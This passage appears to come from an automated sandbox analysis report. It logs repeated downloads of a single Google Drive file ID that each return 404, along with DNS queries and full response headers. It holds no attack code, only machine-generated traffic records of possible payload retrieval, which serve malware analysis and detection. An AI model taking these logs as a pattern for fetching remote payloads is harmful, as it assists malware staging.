      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQY9uwTbfrc2XWd67WsUvNP6pgJGtq08kJCizlg3n_Qk8bvs51hZ6IdVmXK3F9CET7NBvpoxJkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:46:43 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-EIMr6JBmjIA9V9IbEYN30w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4; expires=Sat, 12-Jul-2025 14:46:43 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7hLsvh8M5LljU14n8npZ-HPOaXrxVKvrf8bcuVnF2BXQx2fWxUUgUkYf2Z1dT4j_NuI6ihP2kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:46:55 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-DaVE8Uahnw38VEV5cmDUvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4TBrQ_Fp3sbHlN_ZHDXxPx0DE-RgcXtrzFJhG893uiM7yGOg6kXWzErg12dOOdR96iA9j908gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:47:08 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7e3kLz7IRHszEqhIjf7SUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTzUnDpzegSZUXLR0lzrpp1gehyFLNUdFp5fzVVpoX34js9APPCE5mOrt0XogztPc2eContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:47:20 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-dKDFNqJAh2X73NAczgyJ-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC49TlgbNJ4MQv2eaUgaA-9CgCmwnmnDQ9r64Rys15Oqi2ujB_KZDLkyiw4TCP6Z-FYV0hzdlrkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:47:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-awSwz3-tz-B9Yo4_eOE0Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6E1QVT-5mDz3-pViz9FjBGkptJcbK2KUKFEP-Uul6I7YVPdTo5IdRZVA6Wvkg8IFQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:47:44 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-q0Eev2NEi_zyL7mnjSFTeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ZN4-46VLyB1_d3_Rbklq2PTcBkllD0Iwls_iBq779Meh_4ZkZ4cWemkL8Bn35iIQeppN0NuoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:47:56 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-z6a4_edu3zkqGxDJ8kmPHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQQGiLojYIV7-PJv6RfB1PGHsJXA1JTkzGc2LjqoCnjbu_GNEkulYXVmDxgBUcGMc_8x6_F94AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:48:09 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-QXcaE4hGPt2Lxs3VnymKcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, 